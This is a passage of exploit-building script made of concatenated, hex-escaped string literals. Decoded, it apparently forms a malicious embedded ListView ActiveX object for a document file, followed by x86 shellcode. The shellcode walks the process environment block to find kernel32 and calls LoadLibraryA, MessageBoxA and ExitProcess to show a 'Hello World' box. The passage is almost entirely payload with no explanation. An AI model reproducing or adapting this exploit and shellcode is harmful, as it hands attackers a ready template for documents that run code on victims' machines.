+"\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x34\x46\x30\x30\x34\x33\x30\x30\x35\x38\x30\x30\x34\x45\x30\x30\x34\x31\x30\x30\x34\x44\x30\x30\x34\x35\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x31\x30\x31\x30\x30\x30\x30\x30\x30\x30\x33\x30\x30\x30\x30\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x31\x36\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x33\x30\x30\x36\x46\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x36\x35\x30\x30\x36\x45\x30\x30\x37\x34\x30\x30\x37\x33\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x32\x30\x30\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30\x37\x45\x30\x35\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x46\x45\x46\x46\x46\x46\x46\x46\x30\x33\x30\x30\x30\x30\x30\x30\x30\x34\x30\x30\x30\x30\x30\x30\x30\x35\x30\x30\x30\x30\x30\x30\x30\x36\x30\x30\x30\x30\x30\x30\x30\x37\x30\x30\x30\x30\x30\x30\x30\x38\x30\x30\x30\x30\x30\x30\x30\x39\x30\x30\x30\x30\x30\x30\x30\x41\x30\x30\x30\x30\x30\x30\x30\x42\x30\x30\x30\x30\x30\x30\x30\x43\x30\x30\x30\x30\x30\x30\x30\x44\x30\x30\x30\x30\x30\x30\x30\x45\x30\x30\x30\x30\x30\x30\x30\x46\x30\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x31\x31\x30\x30\x30\x30\x30\x30\x31\x32\x30\x30\x30\x30\x30\x30\x31\x33\x30\x30\x30\x30\x30\x30\x31\x34\x30\x30\x30\x30\x30\x30\x31\x35\x30\x30\x30\x30\x30\x30\x31\x36\x30\x30\x30\x30\x30\x30\x31\x37\x30\x30\x30\x30\x30\x30\x46\x45\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x46\x30\x30\x39\x32\x30\x33\x30\x30\x30\x34\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x43\x30\x30\x36\x39\x30\x30\x37\x33\x30\x30\x37\x34\x30\x30\x35\x36\x30\x30\x36\x39\x30\x30\x36\x35\x30\x30\x37\x37\x30\x30\x34\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x32\x31\x34\x33\x33\x34\x31\x32\x30\x38\x30\x30\x30\x30\x30\x30\x36\x61\x62\x30\x38\x32\x32\x63\x62\x62\x30\x35\x30\x30\x30\x30\x34\x45\x30\x38\x37\x44\x45\x42\x30\x31\x30\x30\x30\x36\x30\x30\x31\x43\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x36\x30\x30\x30\x31\x35\x36\x30\x41\x30\x30\x30\x30\x30\x31\x45\x46\x43\x44\x41\x42\x30\x30\x30\x30\x30\x35\x30\x30\x39\x38\x35\x44\x36\x35\x30\x31\x30\x37\x30\x30\x30\x30\x30\x30\x30\x38\x30\x30\x30\x30\x38\x30\x30\x35\x30\x30\x30\x30\x38\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x46\x44\x45\x45\x43\x42\x44\x30\x31\x30\x30\x30\x35\x30\x30\x39\x30\x31\x37\x31\x39\x30\x30\x30\x30\x30\x30\x30\x38\x30\x30\x30\x30\x30\x30\x34\x39\x37\x34\x36\x44\x37\x33\x36\x34\x30\x30\x30\x30\x30\x30\x30\x32\x30\x30\x30\x30\x30\x30\x30\x31\x30\x32\x32\x32\x32\x30\x30\x43\x30\x30\x30\x30\x30\x30\x34\x33\x36\x46\x36\x32\x36\x41\x36\x34\x30\x30\x30\x30\x30\x30\x38\x32\x38\x32\x30\x30\x30\x30\x38\x32\x38\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x63\x62\x39\x38\x30\x39\x37\x37\x39\x30\x39\x30\x39\x30\x39\x30\x39\x30\x39\x30\x39\x30\x39\x30\x33\x33\x63\x39\x36\x34\x38\x62\x34\x39\x33\x30\x38\x62\x34\x39\x30\x63\x38\x62\x34\x39\x31\x63\x38\x62\x35\x39\x30\x38\x38\x62\x34\x31\x32\x30\x38\x62\x30\x39\x38\x30\x37\x38\x30\x63\x33\x33\x37\x35\x66\x32\x38\x62\x65\x62\x30\x33\x36\x64\x33\x63\x38\x62\x36\x64\x37\x38\x30\x33\x65\x62\x38\x62\x34\x35\x32\x30\x30\x33\x63\x33\x33\x33\x64\x32\x38\x62\x33\x34\x39\x30\x30\x33\x66\x33\x34\x32\x38\x31\x33\x65\x34\x37\x36\x35\x37\x34\x35\x30\x37\x35\x66\x32\x38\x31\x37\x65\x30\x34\x37\x32\x36\x66\x36\x33\x34\x31\x37\x35\x65\x39\x38\x62\x37\x35\x32\x34\x30\x33\x66\x33\x36\x36\x38\x62\x31\x34\x35\x36\x38\x62\x37\x35\x31\x63\x30\x33\x66\x33\x38\x62\x37\x34\x39\x36\x66\x63\x30\x33\x66\x33\x33\x33\x66\x66\x35\x37\x36\x38\x36\x31\x37\x32\x37\x39\x34\x31\x36\x38\x34\x63\x36\x39\x36\x32\x37\x32\x36\x38\x34\x63\x36\x66\x36\x31\x36\x34\x35\x34\x35\x33\x66\x66\x64\x36\x33\x33\x63\x39\x35\x37\x36\x36\x62\x39\x33\x33\x33\x32\x35\x31\x36\x38\x37\x35\x37\x33\x36\x35\x37\x32\x35\x34\x66\x66\x64\x30\x35\x37\x36\x38\x36\x66\x37\x38\x34\x31\x30\x31\x66\x65\x34\x63\x32\x34\x30\x33\x36\x38\x36\x31\x36\x37\x36\x35\x34\x32\x36\x38\x34\x64\x36\x35\x37\x33\x37\x33\x35\x34\x35\x30\x66\x66\x64\x36\x35\x37\x36\x38\x37\x32\x36\x63\x36\x34\x32\x31\x36\x38\x36\x66\x32\x30\x35\x37\x36\x66\x36\x38\x34\x38\x36\x35\x36\x63\x36\x63\x38\x62\x63\x63\x35\x37\x35\x37\x35\x31\x35\x37\x66\x66\x64\x30\x35\x37\x36\x38\x36\x35\x37\x33\x37\x33\x30\x31\x66\x65\x34\x63\x32\x34\x30\x33\x36\x38\x35\x30\x37\x32\x36\x66\x36\x33\x36\x38\x34\x35\x37\x38\x36\x39\x37\x34\x35\x34\x35\x33\x66\x66\x64\x36\x35\x37\x66\x66\x64\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30".
+"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31